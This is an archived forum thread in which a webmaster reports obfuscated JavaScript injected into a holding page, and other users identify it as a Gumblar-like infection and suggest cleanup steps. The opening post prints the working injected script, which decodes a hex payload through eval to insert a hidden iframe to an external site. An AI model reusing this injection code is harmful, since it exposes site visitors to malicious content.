Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Suspicious code in our html?!?

  • 16-07-2009 8:18am
    #1
    Closed Accounts Posts: 150 ✭✭


    Guys, I uploaded a holding page for a new site yesterday and this morning found the formatting a bit off... so I looked at the code and found 2 scripts which I hadn't put there!

    I have now removed it.

    Anyone know what it was trying to do? How it got there? Or what I should do to prevent a repeat?

    Here's what appeared:

    Just after <body>
    <script>c07dca4='';rd3b31cb9cd=document;rd3b31cb9cd.write('<scr'+'ipt>function rdf9534(r818206cd){return ev'+c07dca4+'al(r818206cd); }</scr'+'ipt>'); function c07442678cr715bc074(r298d5f2485){ function rbbdebe3(){return 16;} var dd70='';return (rdf9534('pars'+dd70+'eInt')(r298d5f2485,rbbdebe3()));}function r3d8170(rf0f623){ var r1e96b4=2; var rf52794f0ec='';r43425='fromCh';r4431d0a867=String[r43425+'arCode'];for(rc58967=0;rc58967<rf0f623.length;rc58967+=r1e96b4){ rf52794f0ec+=(r4431d0a867(c07442678cr715bc074(rf0f623.substr(rc58967,r1e96b4))));}return rf52794f0ec;} var rd54710f0='3C7363726970743E69662821'+c07dca4+'6D796961'+c07dca4+'297B646F63756D656E742E777269746528756E65736361'+c07dca4+'7065282027253363253639253636253732253631'+c07dca4+'253664253635253230253665253631'+c07dca4+'253664253635253364253633253330253337253230253733253732253633253364253237253638253734253734253730253361'+c07dca4+'253266253266253733253735253661'+c07dca4+'253635253734253663253639253665253635253265253732253735253266253733253633253635253665253635253732253639253633253265253638253734253664253663253366253237253262253464253631'+c07dca4+'253734253638253265253732253666253735253665253634253238253464253631'+c07dca4+'253734253638253265253732253631'+c07dca4+'253665253634253666253664253238253239253261'+c07dca4+'253332253336253338253333253333253332253239253262253237253635253636253336253336253634253636253333253336253237253230253737253639253634253734253638253364253337253330253338253230253638253635253639253637253638253734253364253333253337253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c07dca4+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c07dca4+'2536642536352533652729293B7D7661'+c07dca4+'72206D796961'+c07dca4+'3D747275653B3C2F7363726970743E';rd3b31cb9cd.write(r3d8170(rd54710f0));</script>

    Just after </html>
    <script>check_content()</script>


Comments

  • Registered Users, Registered Users 2 Posts: 68,317 ✭✭✭✭seamus


    Is this using any kind of "free" hosting or somesuch. Providers of budget or free hosting in the past have altered customer sites to include ads and whatnot.


  • Registered Users, Registered Users 2 Posts: 2,934 ✭✭✭egan007


    Have you googled it....plenty of results

    <script>check_content()</script>


  • Closed Accounts Posts: 150 ✭✭515


    No. Paid hosting. No ad appeared... just blank space at the top of the page...


  • Registered Users, Registered Users 2 Posts: 1,176 ✭✭✭podgeen


    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?


  • Closed Accounts Posts: 150 ✭✭515


    Yes, I have updated virus protection.

    No, I haven't seen this on any other pages I have uploaded.


  • Advertisement
  • Closed Accounts Posts: 150 ✭✭515


    Has anyone any idea what that code would have done?


  • Closed Accounts Posts: 150 ✭✭515


    podgeen wrote: »
    It looks similar to a Gumblar infection but does not appear to have the usual characteristics.

    Have you got an updated virus scan on the machine you used to upload the files? Have you seen this appear on any other pages/sites that you have access to?

    Just spoke to our hosts and it looks like padgeen is spot on. Somehow it got past my antivirus... will do a scan now and try to find and remove it.

    Then it's recommended that (from a clean pc) I change my ftp passwords.

    Thanks all.


  • Registered Users, Registered Users 2 Posts: 9,579 ✭✭✭Webmonkey


    I had this, did you get it removed.
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)


  • Closed Accounts Posts: 150 ✭✭515


    Webmonkey wrote: »
    I had this, did you get it removed.
    I had a case where it created a htaccess file to redirect content via a proxy script that embedded the content. Very smart :)

    Well I removed those 2 bits of script... I haven't checked the htaccess file...


  • Registered Users, Registered Users 2 Posts: 9,579 ✭✭✭Webmonkey


    515 wrote: »
    Well I removed those 2 bits of script... I haven't checked the htaccess file...
    That's ok if you saw it in it. But when I downloaded the file and removed it and uploaded again, it appeared again. Then I noticed what was happening. That was only the case with one or two my sites, the rest were just embedded manually.


  • Advertisement
Advertisement